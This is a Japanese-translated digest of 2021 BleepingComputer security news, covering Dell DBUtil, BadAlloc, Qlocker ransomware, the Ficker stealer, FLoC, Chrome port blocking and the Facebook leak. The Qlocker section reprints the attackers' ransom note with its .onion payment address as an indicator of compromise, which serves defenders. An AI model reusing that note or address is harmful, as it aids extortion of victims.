     サイバーセキュリティ企業SentinelOneのセキュリティ研究者Kasif DekelよるDBUtilドライバの詳細な検証の結果、「非管理者ユーザからカーネルモード特権(【訳注】マイクロプロセッサ(CPU/MPU)の実行モードの一つで、すべての命令を制限なく実行できるモード(e-Wordより))に特権を昇格させる」悪用が可能であることが発見された。
     このレベルのパーミッションで行動している攻撃者のコードは、あらゆるメモリアドレス参照を含むそのシステム上で利用可能な全てのハードウエアに無制限にアクセスできる。
     この種の脆弱性は、攻撃者が悪用するには事前にそのコンピュータを改竄する必要があるために緊急とは考えられていない。しかしながら、脅威のアクターとマルウェアは感染したシステムに永続性を獲得することが可能である。
     追跡番号は1つであるが、そこには5つの個別のフローがあるとDekelは発言している。脆弱性の殆どは、特権の昇格を導くものであり、1つのコードロジック問題は、Denial of Service(DoS)を導くものである。

    CVE-2021-21551 ローカルの特権昇格 メモリ損壊
    CVE-2021-21551 ローカルの特権昇格 メモリ損壊
    CVE-2021-21551 ローカルの特権昇格 入力検証の欠如
    CVE-2021-21551 ローカルの特権昇格 入力検証の欠如
    CVE-2021-21551 Denial of Service コードロジック問題

     この研究者は、本日のブログへの投稿で技術情報を提供しているが、ユーザにパッチを適用する時間を与えるために、このフローをトリガーしたり悪用したりするための詳細は控えている。彼は6月1日に概念の実証エクスプロイト コードを共有する計画である。
     DekelはDellがこの脆弱性用のセキュリティアドバイザリを準備していると発言している。この救済策は、修正されたドライバであるが、この研究者は、このレポートを記述している時点で、Dellは脆弱性のあるドライバに関する証明書を無効にしていなかったと、つまり、ネットワーク上の攻撃者は依然として攻撃にこの脆弱性を使用することができることを意味していると発言している。

     「組織のネットワークにアクセスできる攻撃者は、未パッチのDellのシステムで、コードを実行するためのアクセス権を取得し、この脆弱性を利用してローカルの特権昇格を取得する可能性がある。次に、攻撃者は他のテクニックを活用して、横断的により広範なネットワークに方向転換することができる」- SentinelOne

     脆弱なDBUtilドライバーが長寿命であり、潜在的な被害者が多数いるにもかかわらず、SentinelOneは、すぐに変更される可能性があものの、これらの脆弱性が実際に悪用されていることを示す指標は見られないと述べている。
     SentinelOneは、脆弱なDBUtilドライバーを悪用して、ターゲットシステムでローカルの特権の昇格を達成できることを示すビデオを公開した。


    Windows 10 DefenderがMicrosoftへのファイル アップロードを停止する方法
    BleepingComputer : News>Security(2021/05/02)
     他のアンチウィルス プログラムのように、Microsoft Defenderも、それらが悪意あるものか否かを決定するためにMicrosoftにファイルをアップロードする。しかしながら、これをプライバシーリスクと見做し、サードパーティーにアップロードするより、自身のコンピュータ上に置いたままにしておきたいとする人々がいる。
     Microsoft Defenderはデバイスをスキャンすると、Defaultで、ファイルが悪意あるものであると疑われる時、そのファイルをMicrosoftサーバにアップロードするために「自動サンプル送信」機能を使用する。
     Microsoftのクラウドベースの保護は、ファイルを解析し悪意あるものであれば、Microsoft Defenderは、そのデバイス上にそのファイルを隔離する。
     ファイルを送信する時、Microsoft Defenderは実行ファイルとスクリプトは自動的にアップロードするが、ドキュメントのような個人情報を含む恐れのあるファイルをアップロードするときには最初にユーザに警告している。

    Microsoft Defender自動サンプル送信プロンプト(画像をクリックすると拡大表示されます)

     「Windows Defender ウイルス対策がオンの場合は、デバイスのセキュリティ状態を監視します。Windows Defenderによって、マルウェアの疑いがあるソフトウェアやその他の望ましくないソフトウェアについて Microsoft に送信するレポートが自動的に作成されます。このレポートには、マルウェアが存在する可能性があるファイルが含まれる場合もあります」と、「ユーザ データが含まれる可能性が低いファイルは自動的に送信されます。ただし、Windows Defenderウイルス対策がドキュメント、スプレッドシート、またはその他の種類の個人用コンテンツが含まれる可能性があるファイルを送信しようとする場合には、許可を求められます(【訳注】共にMicrosoft日本語ホームページより引用)」と、MicrosoftのWindows 10とオンラインサービスでMicrosoftは説明している。

    プライバシーリスクの可能性?

     私は、解析のために疑わしいファイルをアップロードすることは大変役に立つ機能だと考えるが、一部のアンチウィルスユーザは、これをプライバシーリスクと捉え無効化したいかもしれない。
     「おそらく、最も重要なのはプライバシーである。これらは私のコンピュータ上の私のファイルなので、人が読もうが読むまいが、私の許諾なく送信されたくない」と、この機能を無効化したいWindows 10ユーザは説明している。  自動ファイル送信はまた、米国政府とロシアのアンチウィルス企業Kasperskyとの間での仲違いを発生させる可能性もある。
     2015年、Kasperskyは、ミステリアスな"Equation Group"に関連する一連のNSA(米国家安全保障局)の監視とハッキングツールを検出したと公開した。
     これらのツールは、これらのツールを持ち帰り、Kasperskyアンチウィルスを稼働させている自身のPCにそれらを格納したNSAの協力者のPCから繰り返しアップロードされた。このアンチウィルスは、これらのファイルを疑わしいものとして検出し、当時ロシアにあったKasperskyのサーバにアップロードした。

    Microsoft Defenderの自動ファイルアップロードを無効にする方法

     我々は、依然としてユーザのコンピュータのセキュリティを向上させるために自動サンプル送信を可能にするように提案するが、あなたがMicrosoft Defenderの機能を無効にしたいのであれば、以下のステップを使用する。
      1. スタートメニューをクリックし、"Windows Security”で検索する。検索結果にこれが表示されたら、これを開く。
      2. Windows Securityが開いたら、'Virus & threat protection'(ウイルスと脅威の防止)をクリックする。
      3. Virus & threat protection(ウイルスと脅威の防止)が開いたら、Virus & threat protection(ウイルスと脅威の防止)カテゴリの下にある'Manage Settings'(設定の管理)をクリックする。

      設定の管理オプション(画像をクリックすると拡大表示されます)

      4. Virus & threat protection(ウイルスと脅威の防止)で、スクロールダウンし、以下の図に示したように 'Automatic sample submission'(自動サンプル送信)を無効にする。

      自動サンプル送信の無効化(画像をクリックすると拡大表示されます)

      5. 無効に設定したら、User Account Control(UAC、ユーザアカウント制御)が表示されるのでYesボタンをクリックする。
     自動サンプル送信は、これで無効化された。上記ステップを逆にすることで再び有効にすることができる。


    MicrosoftがIoT、OTデバイス中に緊急のコード実行のバグを発見
    BleepingComputer : News>Security(2021/04/29)
     Microsoftの研究者は、Internet of Things (IoT)デバイスとOperational Technology (OT) 産業システム中に、2ダースに及ぶ緊急のリモードコード実行の脆弱性を発見した。
     これら25のセキュリティフローは、まとめてBadAllocとして知られており、メモリアロケーションのInteger OverflowやWraparoundバグを原因として発生する。
     脅威のアクターは、脆弱性のあるIoTとOTシステム上でシステムクラッシュのトリガーにし、リモートから悪意あるコードを実行するために、これらの脆弱性を悪用することができる。
     この脆弱性は、Microsoftの研究者が、複数のリアルタイム オペレーティングシステム(RTOS), C標準ライブラリ(libc)実装, 組み込みソフトウェア開発キット(SDKs)で広汎に使用されている標準メモリアロケーション関数中に発見したものである。
     「我々の調査によると、IoTデバイスと組み込みソフトウェアの一部として長年にわたって記述されていたメモリアロケーションの実装には、適切な入力検証が組み込まれていない」と、「これらの入力検証がないので、攻撃者は、メモリアロケーション関数を悪用し、ヒープオーバーフローを発生させ。結果として、ターゲットののデバイス上で悪意あるコードを実行することができる」と、Microsoftセキュリティ レスポンスセンターのチームは発言している。

    BadAlloc攻撃に対して脆弱なデバイス

     BadAlloc脆弱性によって影響を受ける脆弱性のあるIoTとOTデバイスは、消費者、医療、産業用ネットワークに見つけることができる。
     BadAllocによって影響を受けるデバイスの完全なリストは、以下を含んでいる(パッチへのリンクはCISAのアドバイザリ中で利用できる)。
      ・ Amazon FreeRTOS, Version 10.4.1
      ・ Apache Nuttx OS, Version 9.1.0
      ・ ARM CMSIS-RTOS2, versions prior to 2.1.3
      ・ ARM Mbed OS, Version 6.3.0
      ・ ARM mbed-uallaoc, Version 1.3.0
      ・ Cesanta Software Mongoose OS, v2.17.0
      ・ eCosCentric eCosPro RTOS, Versions 2.0.1 through 4.5.3
      ・ Google Cloud IoT Device SDK, Version 1.0.2
      ・ Linux Zephyr RTOS, versions prior to 2.4.0
      ・ Media Tek LinkIt SDK, versions prior to 4.6.1
      ・ Micrium OS, Versions 5.10.1 and prior
      ・ Micrium uCOS II/uCOS III Versions 1.39.0 and prior
      ・ NXP MCUXpresso SDK, versions prior to 2.8.2
      ・ NXP MQX, Versions 5.1 and prior
      ・ Redhat newlib, versions prior to 4.0.0
      ・ RIOT OS, Version 2020.01.1
      ・ Samsung Tizen RT RTOS, versions prior 3.0.GBB
      ・ TencentOS-tiny, Version 3.1.0
      ・ Texas Instruments CC32XX, versions prior to 4.40.00.07
      ・ Texas Instruments SimpleLink MSP432E4XX
      ・ Texas Instruments SimpleLink-CC13XX, versions prior to 4.40.00
      ・ Texas Instruments SimpleLink-CC26XX, versions prior to 4.40.00
      ・ Texas Instruments SimpleLink-CC32XX, versions prior to 4.10.03
      ・ Uclibc-NG, versions prior to 1.0.36
      ・ Windriver VxWorks, prior to 7.0

    BadAlloc緩和策

     この脆弱性は、発見されCISAに通報された、IoT研究グループのMicrosoftの'Section 52' Azure Defenderのセキュリティ研究者David Atch, Omri Ben Bassat, Tamir Arielによってベンダに強い衝撃が与えられた。
     このセキュリティ侵害のリスクを軽減するために、CISAは、BadAlloc攻撃に対して脆弱性のあるデバイスを使用している組織に以下を実行するよう推奨している。
      ・ 利用可能なベンダのアップデートを適用する
      ・ 全ての制御システムデバイスやシステムのネットワークへの露出を最小限に抑え、インターネットからアクセスできないようにする
      ・ 制御システムネットワークとリモートデバイスをファイアウォールの背後に配置し、ビジネスネットワークから分離する
      ・ リモートアクセスが必要な場合は、仮想プライベートネットワーク(VPN)等の安全な方法を使用する。VPNは脆弱性が存在する可能性があるため、利用可能な最新バージョンに更新する必要がある。また、VPNは接続されたデバイスと同等の安全性しかないことに注意する

     脆弱性のあるデバイスが即座にパッチできないのであれば、Microsoftは以下のことをアドバイスしている。

      ・ 脆弱性のあるデバイスがインターネットへの露出を最小化したり排除したりすることによって、攻撃される対象領域を減少する
      ・ 重要な資産を保護するためにネットワーク セグメンテーション(【訳注】大規模なネットワークを小規模なネットワークに分割して管理すること(IT用語辞典より))を強化する。
      ・ 
     CISAはまた、実行が推奨される制御システムセキュリティ標的型サイバー侵入検知と緩和戦略に関する技術情報論文も提供している。
     これまでのところ、Microsoftは、BadAllocの積極的な悪用を検出していないが、CISAは、追跡を容易にするために、組織を標的とした悪意のある活動を報告するよう組織に求めている。
     米国国家安全保障局(NSA)は本日早く、ITおよびOTコネクションのリスクを評価し、悪意のある活動の防御と検出に関するセキュリティ アドバイザリを公開した。


    Twitter誤ってアカウント確認を依頼する疑わしいメールを送信
    BleepingComputer : News>Security(2021/04/21)
     Twitterは、彼らがユーザにアカウントの確認を要請するeMailを誤って送信したことで、木曜日の夜、完全なパニックに陥った。このメールはフィッシング攻撃のように見えるものである。
     これらのeMailは、多数のTwitterアカウントを持つBleepingComputerで、そのライターが受け取ったは米国東部時間の10時頃のことである。
     これらのeMailは、 件名に"Confirm your Twitter account" (日本では、「Twitterアカウントを確認してください」)が使用されており、'Confirm Now'とラベルされたボタンが含まれている。eMail中のリンクは全て正当なもののように見えるが、我々にとって予期しないeMailであったので、即座にフィッシング攻撃ではないかと疑った。

    木曜日の夜に送信された疑わしいTwitterのアカウント確認メール(画像をクリックすると拡大表示されます)

     ユーザがこのメールに対する懸念をTwitterに照会したので、このeMailに疑いを持ったのは我々だけではなかったことが判明した。  この確認メールは、Twitterによる単純な誤りであることがTwitter Supportアカウントによって確認されたので、フィッシング攻撃ではないことが判明した。
     受信トレイにTwitter確認eMailの存在を見つけた人は、このメッセージを確実に無視し削除しなさい。

    【訳者補注】この件に関する日本語情報としては、こちらのサイトもあります.


    大規模なQlocker身代金要求型マルウェア攻撃は7zipを使用してQNAPデバイスを暗号化している
    BleepingComputer : News>Security(2021/04/21)
     世界中のQNAPデバイスをターゲットにした大規模な身代金要求型マルウェアキャンペーンが進行中であり、ユーザは、パスワードで保護された7zipアーカイブ中に彼らのファイルが格納されていることを発見している。
     この身代金要求型マルウェアは、Qlockerと呼ばれており、2021年04月19日にQNAPデバイスを標的にし始めた。それ以来、我々のサポートフォーラムは大変な活況を呈し、ID-Ransomware(【訳注】被害者がファイルを暗号化したランサムウェアを特定できる、BleepingComputerのWebサイト)では被害者からの投稿が急増している。

    Qlocker犠牲者からのID-R投稿(画像をクリックすると拡大表示されます)

     BleepingComputer Qlockerサポートトピックへの犠牲者からのレポートによると、攻撃者は7zipを使用してQNAPデバイス上のファイルをパスワードで保護されたアーカイブに移動する。ファイルがロックされている間に、QNAP Resource Monitorは、7zipコマンドライン実行である多数の'7z'プロセスを表示する。

    QNAP Resource Monitorに見られる稼働中の7zip(画像をクリックすると拡大表示されます)

     この身代金要求型マルウェアが終了すると、QNAPデバイスのファイルは、.7z拡張子で終了するパスワードで保護された複数の7-zipアーカイブに格納される。この複数のアーカイブを解凍するには、犠牲者は、攻撃者のみが知っているパスワードを入力する必要がある。

    パスワードで保護された7zipアーカイブ(画像をクリックすると拡大表示されます)

     QNAPデバイスが暗号化されると、ユーザは!!!READ_ME.txt脅迫文を残される。この脅迫文は、犠牲者がTor支払いサイトにログインするために入力する必要のある一意のクライアントキーを含んでいる。

    Qlocker脅迫文(画像をクリックすると拡大表示されます)

     BleepingComputerが確認したQlocker脅迫文から、犠牲者は、アーカイブファイル用のパスワードを得るために0.01 Bitcoin(およそ、$557.74。60,289円)の支払いを告げられている。

    QlockerのTor支払いサイト(画像をクリックすると拡大表示されます)

    Update 4/22/21 12:44 AM(米国東部時間): 弱点が発見された可能性がある。犠牲者は無料でファイルを復元できる可能性がある。依然として調査中なので、10 AM(米国東部時間)くらいにアップデートを投稿する。

    Update 4/22/21 09:15 AM(米国東部時間): 今朝早く、BleepingComputerは、Jack CableからQlockerのTorサイトで、ユーザーが7zipパスワードを無料で復元できるバグを発見したと連絡を受けた。

    QNAPは最近の脆弱性を使用されている

     最近QNAPは、リモート攻撃者がデバイスへのフルアクセスを取得し、身代金要求型マルウェアを実行することが可能な緊急の脆弱性を解決した。
     QNAPは、以下の説明と共に二つの脆弱性を4月16日に修正した。  これらの脆弱性に関する詳細な情報は、QNAPに対してバグを公開したSAM Seamless Network研究チームによるブログの投稿中に見出される。
     QNAPがBleepingComputerに告げたところによると、彼らは、脆弱性のあるデバイスに身代金要求型マルウェアを実行できるCVE-2020-36195脆弱性をQlockerに攻撃されたと確信している。
     これにより、QTS, Multimedia Console, Media Streamingアドオンを最新バージョンにアップデートすることが強く推奨されている。
     これはファイルを復元することはないが、この脆弱性を使用する将来の攻撃からあなたを守ることになるだろう。

    Qlocker IOCs:

    関連するファイル !!!READ_ME.txt

    脅迫文 !!! All your files have been encrypted !!!
    All your files were encrypted using a private and unique key generated for the computer. This key is stored in our server and the only way to receive your key and decrypt your files is making a Bitcoin payment.
    To purchase your key and decrypt your files, please follow these steps:
    1. Dowload the Tor Browser at "https://www.torproject.org/". If you need help, please Google for "access onion page".
    2. Visit the following pages with the Tor Browser:
    gvka2m4qt5fod2fltkjmdk4gxh5oxemhpgmnmtjptms6fkgfzdd62tad.onion
    3. Enter your Client Key:
    [client_key]


    偽のMicrosoft Store, Spotifyサイトが情報を盗むマルウェアを拡散している
    BleepingComputer : News>Security(2021/04/18)
     攻撃者は、Webブラウザに保存されているクレジットカードやパスワードを盗むためのマルウェアを配布するためにMicrosoft Store, Spotify, オンライン ドキュメント コンバータを装うサイトを宣伝している。
     この攻撃は、サイバーセキュリティ企業ESETによって発見され、昨日Twitterで悪意あるキャンペーンに注意せよとする警告が発せられた
     ESETの脅威検出研究所の所長Jiri Kropacとの会話で、BleepingComputerは、この攻撃が正当なアプリケーションであるかのように宣伝する悪意ある広告を介して運営されていることを認識した。
     例えば、この攻撃に使用されている広告の一つは、オンラインChessアプリケーションを宣伝している。
     しかしながら、ユーザがこの広告をクリックすると、ユーザはインチキの'xChess 3'オンライン チェス アプリケーション用の偽のMicrosoft Storeのページに連れて行かれ、Amazon AWSサーバから自動的にダウンロードされる。
     ダウンロードされたZIPファイルは、'xChess_v.709.zip' [VirusTotal]と名付けられている。これは実際には'Ficker'もしくは'FickerStealer'である。このソフトはBleepingComputerによって作成された Any.Run reportに示されているように、偽装した情報を盗むマルウェアである。

    Fickerマルウェアを配布している偽のMicrosoft Storeページ(画像をクリックすると拡大表示されます)

     このマルウェア キャンペーンの他の広告は、Spotify(下図参照)やオンライン ドキュメント コンバータを装っている。訪問すると、ユーザが到着したページもFickerマルウェアを含むZIPファイルを自動的にダウンロードする。

    到着した偽のSpotifyページ(画像をクリックすると拡大表示されます)

    Fickerマルウェアはどのようなものか

     Fickerは、開発者が別の脅威のアクターにこのマルウェアを有料で貸出を始めた1月にロシア語で意思の疎通をするハッカーフォーラムにリリースされた情報を盗むためのトロイの木馬である。
     フォーラムへの投稿で、この開発者は、このマルウェアの能力を説明し、他の脅威のアクターが1週間から6ヶ月、誰かからこのソフトウェアを借りることを可能にしている。

    FickerStealerマルウェアをマーケティングしているフォーラムへの投稿(画像をクリックすると拡大表示されます)

     このマルウェアを使用して、脅威のアクターは、Webブラウザ、デスクトップ メッセージング クライアント(Pidgin, Steam, Discord)、FTPクライアントに保存されている証明書を盗むことができる。
     パスワードを盗むことに加えて、この開発者は、このマルウェアが15以上の暗号通貨ウォレットを盗むことができ、ドキュメントを盗むことができ、犠牲者のコンピュータで稼働中のアクティブなアプリケーションのスクリーンショットを撮ることができると主張している。
     この情報はZIPファイルにコンパイルされ攻撃者に送り返される。そこで彼らはデータを解凍し、他の悪意ある行動に使用することができる。
     Fickerマルウェアの拡張された機能により、このキャンペーンの犠牲者は、即座にオンラインパスワードを変更し、ファイアーウォールで疑わしいポート フォワーディング ルールをチェックし、更なるマルウェアをチェックするためにアンチウィルススキャンを実行すべきである。


    WordPressはそのWebサイトでGoogle FLoCを自動的に無効化する
    BleepingComputer : News>Security(2021/04/18)
     WordPressは、Googleの新しいFLoCトラッキング テクノロジをセキュリティ上の懸念事項として取扱、WordPressサイトでDefaultでブロックする可能性があることを本日アナウンスした。
     かなりの期間、各ブラウザは、関心に基づく広告のために広告主によって使用されるサードパーティのブラウザクッキー[123]のブロックが増加していた。
     これに応えて、GoogleはFederated Learning of Cohorts(FLoC)と呼ばれる新しい広告追跡テクノロジーを導入した。このテクノロジは、Webブラウザを使用して、ユーザがWebをブラウズする方法に基づいて、ユーザを匿名で関心や挙動のグループに分けるものである。
     Googleが、今月Google ChromeでFLoCをテストし始めた後、GoogleのFLoCの実装は、或るプライバシーリスクを別のリスクに置き換えるだけであるとするプライバシー擁護派のコンセンサスがあった。
     「FLoCは、サード-パーティー トラッカーが、それ自体で行っていたプロファイリングを、個々人のブラウザに実行させる新しい方法であり、このケースでは、最近のブラウジング行為を挙動別にラベル付し、これをWebサイトや広告主と共有することを意味している。」
     「このテクノロジは、サードパーティークッキーのリスクは回避するだろうが、このプロセス中で新しいリスクを作成するだろう。これは、差別や略奪をターゲットにすることを含む挙動広告で多くの最も酷い非プライバシー問題を悪化させる可能性がある」と、Electronic Frontier Foundation (EFF、電子フロンティア財団)は最近のブログへの投稿で説明している。
     それ以来、Brave Browser, DuckDuckGo, Vivaldiのような他のプライバシーブラウザと検索エンジンの開発者は、彼らのソフトウェアや、それをブロックするために作成したソフトからFLoCを完全に削除した

    WordPressはFLoCをブロックすることを計画している

     本日の新しいアナウンスで、WordPressは、GoogleのFLoCテクノロジにセキュリティ上の懸念があり、このブログ用ソフトウェアの来るバージョンで、このテクノロジをブロックするつもりであると述べている。
     「WordPressはWebの約41%を支えている。このコミュニティは、4行のコードで人種差別、性差別、反LGBTQ+差別、精神障害者に対する差別と闘うことを支援している」と、WordPressは発言している。
     WordPressは、以下の4行のコードを使用してFLoCを無効化することを計画している。これにより、FLoCをそのサイトで無効化するように告げるHTTPリクエストヘッダーを発行することを、このブログ プラットフォームに発生させる。

    function disable_floc($headers) {
    $headers['Permissions-Policy'] = 'interest-cohort=()';
    return $headers;
    }

    add_filter('wp_headers', 'disable_floc');

     WordPressは、一部の管理者が、このテクノロジを有効にしたいだろうと、これらの管理者は多分上述のコードをオーバーライドする技術的なノウハウを持っているだろうと説明している。WordPressはまた、管理者がFLoCを許可するか否かを制御することを可能にする設定を追加する可能性があると指摘している。
     しかしながら、WordPressの懸念は、この新しいトラッキング テクノロジを認識していない人々が、このテクノロジが何を伴うのかを完全に理解することなく自動的にこれを選択することである。それ故、WordPressに関するこれらユーザの最大の関心事は、このテクノロジを自動的に無効化することである。
     「関係者の利害や、これが緩和のための対応が必要な問題であることに、そもそも気がづいていないウェブサイト管理者のニーズ、これらのサイトのユーザーや訪問者の利害のバランスを考慮すると、そのような対応を取る方が適切である」とWordPressは説明している。
     WordPressは、このブロックは、2021年7月にリリースがスケジュールされているWordPress5.8で計画されているが、提案された変更を実装する前にフィードバックを要求している。
     FLoCは、もう直ロールアウトすると思われているので、WordPressは、このブログ プラットフォームの現在のバージョンへの「影響を増幅」するために、このコードを以前のバージョンにバックポート(【訳注】ソフトウェアの新しいバージョンの機能や、そのバージョン向けに開発されたプログラムなどを、古いバージョンで利用できるように移植すること(e-Wordsより))することを検討している。


    Microsoft Edgeのアップデート サーバーがダウン
    BleepingComputer : News>Security(2021/04/16)
     Microsoft Edgeのアップデートサーバは、世界的な停止に見舞われており、ユーザーは新しくリリースされた、このWebブラウザのバージョン90に更新できないでいる。
     昨日、Microsoftは、Kids Mode、新しいダウンロード ポップアップ、より良いフォント レンダリング、改善されたPDF印刷のような新しい機能の付属するEdge 90をリリースした。
     このアップデートはまた、今週Twitterでリリースされた0-Dayのリモートコード実行の脆弱性を修正しているので、早急にアップデートすることが多分適切な考えである。
     残念ながら、今朝から、ユーザはバージョン90にMicrosoft Edgeを自動アップデートすることが不可能になっており、代わりに、アップデートを実行した時に、以下の0x800421F7エラーが表示される。

    「更新プログラムの確認中にエラーが発生しました: インターネットに接続できません。ファイアウォールを使用している場合は、MicrosoftEdgeUpdate.exe を許可リストに登録してください。 (エラー コード 7: 0x800421F7 -- system level)」

     今当に、BleepingComputerのテストで、このアップデートサーバは、以下に示すように依然として問題を持っている。

    機能していないMicrosoft Edgeアップデートサーバ(画像をクリックすると拡大表示されます)

     この停止が長く続くとは思えないので、今日の後半には、ブラウザのヘルプ -> バージョン情報 に移動してMicrosoftEdgeの自動更新を試みることができるだろう。
     アップデート: Microsoftはこの問題を認識しており、この問題の解決に向けて作業中である。一部の人達は、数回アップデートを実行することで、アップデートに成功している。

    Edit: 我々は本日のカナリアアップデートでも、この問題が発生しているとする報告を確認しています。安定版のエラーに加えて、この問題を調査していることを全ての方々が認識していること確認したかった。以下の潜在的な回避策を引き続き試してください。しばらく待ってから再度更新を試みるようにしてみてください。

     Edit: 一部のユーザーは、数回再試行することでこれが解決したことを発見しています。 引き続きアップデートをチェックして、機能するかどうかを確認してください。ただし、すべての人が機能するとは限りません。 詳細がわかり次第、この投稿を更新し続けます。


    Adobe: PhotoshopとDigital Editionの緊急の脆弱性を修正
    BleepingComputer : News>Security(2021/04/13)
     Adobeは、Adobe Photoshop, Adobe Digital Editions, Adobe Bridge, RoboHelp中のセキュリティ上の脆弱性を解決するセキュリティアップデートをリリースした。
     全体で、Adobeは、4つの製品に影響する10のセキュリティ上の脆弱性を解決した。それらのうちの7つは、任意のコード実行や任意のファイルを書き込むことを可能にする緊急と評価されるものである。
     本日セキュリティアップデートを受け取った全製品中、Adobe Bridgeが最も多く、4つの「緊急」のコード実行のバグと、「重要」と評価される2つの脆弱性が修正されている。
     コード実行のバグは、攻撃者がWindows中の殆ど全てのコマンド(マルウェアのインストールやコンピュータの乗っ取りを含む)を実行することが可能なので、最も深刻なものである。
     Adobe Bridgeのバグに追加して、Adobeはまた、以下を含む彼らの製品群の他の脆弱性も修正した。
     Adobeは、脆弱性のある製品を使用している顧客に、未パッチのインストレーションの脆弱性攻撃を成功に導くことが可能なこのバグを修正するために、可能な限り早急に、この最新バージョンにアップデートするようアドバイスしている。
     殆どの場合、ユーザは、その製品の自動アップデート機能を使用することによって、そのソフトウェアをアップデートすることができる。そのためには以下を使用する。
      ・ ヘルプ > アップデートの有無をチェック を実行する
      ・ 完全なアップデート インストーラは、Adobeのダウンロードセンターからダウンロードすることができる
      ・ 製品の自動アップデートを有効にする。この機能は、ユーザの介在を要求することなく、アップデートが検出されると自動アップデートされる。
     この新しいアップデートが自動アップデートを介して利用できない場合は、上述の最新のダウンロード リンクに関連付けられているセキュリティ ブレチンをチェックしなさい。


    Google ChromeはNATスリップストリーミング攻撃を防止するためにポート10080を封鎖
    BleepingComputer : News>Security(2021/04/09)
     Google Chromeは現在、NATスリップストリーミング2.0攻撃において悪用されているポートを防衛するために、HTTP, HTTPS, FTPのTCPポート10080へのアクセスをブロックしている。
     昨年、セキュリティ研究者Samy Kamkarは、NATスリップストリーミング脆弱性の新しいバージョンを公開した。これは、悪意あるWebサイト上のスクリプトが、訪問者のNATファイアーウォールをバイパスすることができ、訪問者の内部ネットワーク上のあらゆるTCP/UDPポートへのアクセスの取得を可能にするものである。
     これらの脆弱性を使用すると、脅威のアクターは、ルータ設定の改竄、プライベート ネットワーク サービスへのアクセスの取得を含む幅広い攻撃を実行することができる。

    NATスリップストリーミング2.0攻撃のデモンストレーション(画像をクリックすると拡大表示されます)

     この脆弱性は、ルータのApplication Level Gateway (ALG)によってモニターされている特定のポート上でのみ機能するので、ブラウザ開発者は、多くのトラフィックを受け取らない脆弱なポートをブロックしてきた。
     現在、Coogle Chromeは、ポート69, 137, 161, 554, 1719, 1720, 1723, 5060, 5061, 6566へのFTP, HTTP, HTTPSアクセスをブロックしている。
     本日、Googleは、ChromeのTCPポート10080をブロックするつもりであると述べた。このポートに関しては、Firefoxが2020年11月に既にブロックしている。
     このポートをブロックすべきか否かの議論において、ブラウザ開発者は、AmandaバックアップソフトウェアとVMWare vCenterが、このポートを活用しているが、このポートのブロックによって影響を受けないと結論した。
     ポート10080をブロックした場合に最も懸念される点は、一部の開発者がポート80の代わりに、このポートを使用している可能性であったことである。
     「このポートは、末尾が"80"であり、UNIXシステムとの結びつけにルート権限を必要としないので魅力的なポートであった」と、Google Chromeの開発者Adam Riceは説明している。
     開発者が、このポートの継続使用を可能にするために、Riceは、開発者が、このブロックをオーバーライドするために使用できるエンタープライズ ポリシーを追加するだろう。
     ポートがブロックされると、ユーザは、このポートにアクセスを試みた時に、以下に示す 'ERR_UNSAFE_PORT'というエラーメッセージを表示される。

    危険なポートへのアクセスをブロックしているGoogle Chrome(画像をクリックすると拡大表示されます)

     あなたが現在、ポート10080上のWebサイトをホストしているのであれば、別のポートを使用して、Google Chromeが、そのサイトに継続してアクセスできるようにすることを検討しなさい。


    Facebookのデータリークであなたの情報が晒されたか否かを確認する方法
    BleepingComputer : News>Security(2021/04/04)
     データ漏洩通知サービスHave I Been Pwnedは、昨日の5億を超えるユーザの電話番号と情報を含むFacebookのデータリークで、あなたのデータが晒されているか否かをチェックすることを可能にした。
     昨日、脅威のアクターは、533,313,128のFacebookユーザの個人情報(【訳注】 4/5日付毎日新聞朝刊は、日本人のデータ漏洩は42万人と報道しています)をハッキングフォーラムにリリースした。このデータには、携帯電話番号、名前、性別、場所、既婚や未婚の状況、職業、生年月日、eMailアドレスを含んでいる。
     このデータは、Facebookの'Add Friend'機能のバグを使用して2019年に収集された後、当初は、個人随意契約で販売された。これが発見された後、Facebookは直ちにこの脆弱性を閉じたが、脅威のアクターは、昨日最終的に実質無料($2.19)になるまで、このデータを流し続けた。
     それ以来、Troy Huntは、Faceookメンバーのデータがこのリーク中で晒されているか否かをユーザが決定する支援として、彼が所有するHave I Been Pwnedデータ漏洩通知サービスにリークされたデータを追加した。
     Have I Been Pwnedに精通していない人々のために、このサイトは、データ漏洩で晒されたデータをインデックス化しているので、ユーザはメールアドレスをインプットしデータが晒されているデータ漏洩を一覧表示できる優秀なリソースである。
     Faceookリークが、あなたのメールアドレスを含んでいるか否かチェックするには、Have I Been Pwnedにアクセスし、検索フィールドにeMailアドレスを入力する、'pwned?'ボタンをクリックすると、eMailが晒されているデータ漏洩の全てのリストが表示される。
     例えば、以下の画像は、私が昨日のFacebookリークで晒されたことが判明しているeMailアドレスを使用した検索結果である。見ての通り、、Have I Been Pwnedは、このeMailアドレスが昨日リリースされたFacebookのデータ中に発見されたと通知してきている。

    晒されたFacebookユーザを表示しているHave I Been Pwned(画像をクリックすると拡大表示されます)

     残念ながら、昨日のFacebookリークで最も一般的なユーザー識別が可能なフィールドは電話番号である。 ただし、5億3300万のFacebookメンバーのレコードのうち、eMailアドレスが含まれているものは250万にすぎない。
     このことから、あなたのeMailアドレスを検索し、Have I Been Pwnedが一致しないとする結果を戻してきたにしても、あなたは依然として、昨日のリークの一部である可能性は存在している。
     Troyは、ユーザーが電話番号を入力して、Facebookのリークで晒されているか否かを確認する方法を検討しているとツイートしている。
     Huntは昨日「それがロードされたメールアドレスだ」と、そして「私はまだ電話番号をどうするか考えている」とツイートしている。


    5億3300万Facebookユーザの電話番号がハッカーフォーラムにリークされた
    BleepingComputer : News>Security(2021/04/03)
     世界中のおよそ5億3300万Facebookユーザの携帯電話番号と他の個人情報が、人気のあるハッカーフォーラムに無料でリークされた。
     この盗まれたデータは、2020年6月にハッキングコミュニティに現れたのが最初であり、この時はFacebookデータを他のメンバーに販売していた。このリークを目立たせているものは、各アカウントに関連付けられている公開されているプロファイルと個人の携帯電話番号から取得することのできるメンバー情報を含んでいることにある。

    2020/06のFacebookデータの当初のセール(画像をクリックすると拡大表示されます)

     この販売されたデータは、533,313,128 Facebookユーザの情報(メンバーの携帯番号、Facebook ID、名前、性別、場所、既婚や未婚の状況、職業、生年月日、eMailアドレス)を含んでいた。
     BleepingComputerによって確認されたFacebookデータのサンプルから、殆ど全てのユーザのレコードは、携帯電話番号、Facebook ID、名前、性別を含んでいる。
     以下は、米国のレコードの小さなサンプルであり、ニューヨークの917モバイル市外局番で始まる訂正済みの携帯電話番号を示している。

    携帯電話番号付きでリークされた米国Facebookユーザのサンプル(画像をクリックすると拡大表示されます)

